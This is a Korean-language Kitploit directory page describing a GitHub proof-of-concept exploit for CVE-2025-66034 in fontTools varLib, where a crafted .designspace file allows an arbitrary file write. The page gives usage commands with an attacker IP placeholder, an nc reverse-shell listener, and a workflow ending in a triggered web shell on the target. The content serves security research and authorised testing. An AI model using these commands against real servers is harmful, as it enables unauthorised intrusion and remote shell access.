Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
varlib-cve-2025-66034 — fontTools 가변 글꼴 생성 파이프라인의 CVE-2025-66034에 대한 개념 증명(PoC) 익스플로잇입니다. 조작된 .designspace 파일을 통해 출력 경로를 제어할 수 있어 임의 파일 쓰기가 가능해집니다. 이 스크립트는 문제를 시연하기 위해 페이로드 생성, 글꼴 생성 및 업로드를 자동화합니다. | Kitploit
도구/GitHubGitHub/symphony2colour/varlib-cve-2025-66034
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubsymphony2colour/varlib-cve-2025-66034

varlib-cve-2025-66034

fontTools 가변 글꼴 생성 파이프라인의 CVE-2025-66034에 대한 개념 증명(PoC) 익스플로잇입니다. 조작된 .designspace 파일을 통해 출력 경로를 제어할 수 있어 임의 파일 쓰기가 가능해집니다. 이 스크립트는 문제를 시연하기 위해 페이로드 생성, 글꼴 생성 및 업로드를 자동화합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
29일 전아직 검토되지 않음

fontTools varLib CVE-2025-66034 익스플로잇

cve component vulnerability vector impact language dependency license

이 저장소는 새로운 취약점을 소개하지 않습니다.

이것은 fontTools varLib 가변 폰트 생성 파이프라인에 영향을 미치는 CVE-2025-66034에 대한 개념 증명(PoC) 익스플로잇입니다.

이 취약점은 공격자가 조작된 .designspace 파일 내부의 출력 파일명을 제어할 수 있게 합니다. 취약한 폰트 생성 서비스에서 처리될 때, 서버 파일시스템에 임의 파일 쓰기로 이어질 수 있습니다.

varlib_cve_2025_66034.py 스크립트는 페이로드 생성, 폰트 생성, 업로드 및 선택적 셸 트리거링을 자동화합니다.


기능

  • fontTools를 사용한 호환 가능한 마스터 폰트 자동 생성
  • 무작위 셸 파일명 생성
  • 사용자 지정 가능한 대상 경로 및 업로드 엔드포인트
  • 자동 nc 리스너
  • 수동 폰트 준비 불필요

요구 사항

Python 3.9+

의존성 설치:

root@kitploit:~
pip install fonttools requests

리스너에는 Netcat이 필요하므로, --no-listen 옵션을 사용하는 경우 다음 명령이 필요합니다:

root@kitploit:~
nc -lvnp <PORT_NUMBER>

사용법

대상이 mysite.com에서 실행되는 자체 호스팅 랩이고, 업로드 경로, 파일시스템 쓰기 경로 및 웹 접근 가능 트리거 경로가 스크립트의 기본값과 일치한다면, 바로 실행할 수 있습니다.

기본 사용법:

root@kitploit:~
python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT>

대상이 다른 URL이나 파일시스템 경로를 사용할 가능성이 높으므로, 아래의 사용 가능한 옵션(예: --url, --path, --trigger)으로 기본값을 재정의하거나 스크립트를 수동으로 수정하세요.

참고: 멀티파트 업로드 양식 이름은 환경에 따라 다를 수 있습니다. 대상이 스크립트와 동일한 양식 필드 이름을 사용하지 않는 경우, 익스플로잇을 실행하기 전에 files 섹션에서 조정하세요.

옵션

사용자 지정 옵션 예시:

root@kitploit:~
python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT> --path /var/www/mysite.com/public --url http://mysite.com/tools/variable-font-generator/process --trigger http://mysite.com

익스플로잇 워크플로우

  1. 호환 가능한 마스터 폰트 생성
  2. 악성 .designspace 파일 생성
  3. 멀티파트 POST를 통한 페이로드 업로드
  4. 서버에 임의 파일 쓰기
  5. HTTP 요청을 통한 페이로드 트리거

크레딧 / 감사의 말

다음 분들께 특별한 감사와 존경을 표합니다:

  • 오픈소스 fontTools 라이브러리 작업을 해주신 fontTools 프로젝트 유지관리자 및 기여자분들.
  • CVE-2025-66034를 발견하고 책임 있게 공개한 보안 연구원분들.
  • 소프트웨어 보안 개선에 도움이 되는 취약점을 문서화하고 분석하는 오픈소스 보안 커뮤니티.

이 개념 증명은 취약점과 그 영향을 이해하는 데 도움을 주기 위한 교육 및 연구 목적으로 제공됩니다.


면책 조항

이 코드는 교육 및 연구 목적으로만 제공됩니다.

소유하지 않거나 명시적 테스트 허가를 받지 않은 시스템에 이 익스플로잇을 사용하지 마십시오.

저자는 이 소프트웨어로 인한 오용이나 손해에 대해 책임을 지지 않습니다.


참고 자료

  • CVE 세부 정보: https://nvd.nist.gov/vuln/detail/CVE-2025-66034
  • GitHub 권고: https://github.com/advisories/GHSA-768j-98cg-p3fv
  • fontTools 프로젝트: https://github.com/fonttools/fonttools
  • fontTools 문서: https://fonttools.readthedocs.io/
도구 다운로드
인자설명
--ip공격자 리스너 IP
--port리스너 포트
--path파일이 기록될 대상 파일시스템 경로 (웹 셸을 트리거하려면 웹 접근이 가능해야 함)
--url업로드 엔드포인트, 양식은 다를 수 있음
--trigger업로드 후 기록된 페이로드를 트리거하는 데 사용되는 기본 URL
--no-listen자동 netcat 리스너 비활성화